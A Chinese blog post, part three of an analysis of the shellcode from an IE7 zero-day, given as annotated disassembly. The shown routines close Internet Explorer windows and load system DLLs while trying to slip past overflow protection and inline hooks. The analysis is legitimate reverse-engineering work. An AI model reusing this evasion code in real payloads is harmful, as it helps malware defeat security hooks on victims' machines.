查看文章 |
【原创】IE7 0DAY漏洞所用shellcode的分析(三)
2008-12-13 00:52
GetEnumProcAddress: ; 返回EnumWindows的回调函数的地址 004071EE > /EB 02 jmp short 004071F2 004071F0 |58 pop eax 004071F1 |C3 retn 004071F2 \E8 F9FFFFFF call 004071F0 EnumWindowsProc: ; 当窗口为IE窗口时关闭之,当所属线程非当前进程时计数加1(这里我觉得是不是应该只关闭自身线程的窗口才合理呢?)。 004071F7 > 56 push esi 004071F8 57 push edi 004071F9 83EC 08 sub esp, 8 004071FC 8BFC mov edi, esp 004071FE 6A 08 push 8 00407200 57 push edi 00407201 3E:FF77 14 push dword ptr [edi+14] 00407205 E8 5D020000 call <Get_GetClassNameA> 0040720A FFD0 call eax 0040720C 8BFC mov edi, esp 0040720E 68 616D6500 push 656D61 00407213 68 49454672 push 72464549 00407218 8BF4 mov esi, esp ; "IEFrame" 0040721A B9 08000000 mov ecx, 8 0040721F F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi] 00407221 75 2F jnz short 00407252 ; 判断窗口类名是否为IE的类名"IEFrame",否则跳走不做操作 00407223 6A 00 push 0 00407225 3E:FF7424 20 push dword ptr ds:[esp+20] 0040722A E8 24020000 call <Get_GetWindowThreadProcessId> 0040722F FFD0 call eax 00407231 8BF8 mov edi, eax 00407233 E8 CB010000 call <Get_GetCurrentThreadId> 00407238 FFD0 call eax 0040723A 3BF8 cmp edi, eax 0040723C 74 08 je short 00407246 ; 窗口所属线程与自身线程一致则跳 0040723E 36:8B4424 20 mov eax, dword ptr [esp+20] 00407243 3E:FF00 inc dword ptr [eax] 00407246 3E:FF7424 1C push dword ptr ds:[esp+1C] 0040724B E8 EF010000 call <Get_DestroyWindow> 00407250 FFD0 call eax 00407252 83C4 10 add esp, 10 00407255 5F pop edi 00407256 5E pop esi 00407257 B8 01000000 mov eax, 1 0040725C C3 retn Geturlmon: ; 得到urlmon.dll的基址。调用LoadLibraryA时尝试绕过防溢出检测和INLINE HOOK。 0040725D > 68 6F6E0000 push 6E6F 00407262 68 75726C6D push 6D6C7275 00407267 EB 15 jmp short 0040727E 00407269 8D4424 04 lea eax, dword ptr [esp+4] 0040726D 50 push eax 0040726E E8 22FEFFFF call <FindRetCodeInkernel32> 00407273 50 push eax 00407274 E8 4A020000 call <Get_LoadLibraryA> 00407279 ^ E9 E2FEFFFF jmp <CallPassingInlineHook> 0040727E E8 E6FFFFFF call 00407269 00407283 83C4 08 add esp, 8 00407286 C3 retn Getntdll: ; 得到ntdll.dll的基址,与Geturlmon相类似…… 00407287 > 6A 6C push 6C 00407289 68 6E74646C push 6C64746E 0040728E EB 15 jmp short 004072A5 00407290 8D4424 04 lea eax, dword ptr [esp+4] 00407294 50 push eax 00407295 E8 FBFDFFFF call <FindRetCodeInkernel32> 0040729A 50 push eax 0040729B E8 23020000 call <Get_LoadLibraryA> 004072A0 ^ E9 BBFEFFFF jmp <CallPassingInlineHook> 004072A5 E8 E6FFFFFF call 00407290 004072AA 83C4 08 add esp, 8 004072AD C3 retn GetUser32: 004072AE > 68 33320000 push 3233 004072B3 68 75736572 push 72657375 004072B8 EB 15 jmp short 004072CF 004072BA 8D4424 04 lea eax, dword ptr [esp+4] 004072BE 50 push eax 004072BF E8 D1FDFFFF call <FindRetCodeInkernel32> 004072C4 50 push eax 004072C5 E8 F9010000 call <Get_LoadLibraryA> 004072CA ^ E9 91FEFFFF jmp <CallPassingInlineHook> 004072CF E8 E6FFFFFF call 004072BA 004072D4 83C4 08 add esp, 8 004072D7 C3 retn Getshdocvw: 004072D8 > 68 63767700 push 777663 004072DD 68 7368646F push 6F646873 004072E2 EB 15 jmp short 004072F9 004072E4 8D4424 04 lea eax, dword ptr [esp+4] 004072E8 50 push eax 004072E9 E8 A7FDFFFF call <FindRetCodeInkernel32> 004072EE 50 push eax 004072EF E8 CF010000 call <Get_LoadLibraryA> 004072F4 ^ E9 67FEFFFF jmp <CallPassingInlineHook> 004072F9 E8 E6FFFFFF call 004072E4 004072FE 83C4 08 add esp, 8 00407301 C3 retn Getvgx: ; 这个函数似乎没有被调用到,"vgx"也是我直接从字符串中找出来,本身是否有bug存疑。 00407302 > 68 76677800 push 786776 00407307 EB 15 jmp short 0040731E 00407309 8D4424 04 lea eax, dword ptr [esp+4] 0040730D 50 push eax 0040730E E8 82FDFFFF call <FindRetCodeInkernel32> 00407313 50 push eax 00407314 E8 AA010000 call <Get_LoadLibraryA> 00407319 ^ E9 42FEFFFF jmp <CallPassingInlineHook> 0040731E E8 E6FFFFFF call 00407309 00407323 83C4 04 add esp, 4 00407326 C3 retn |
最近读者:
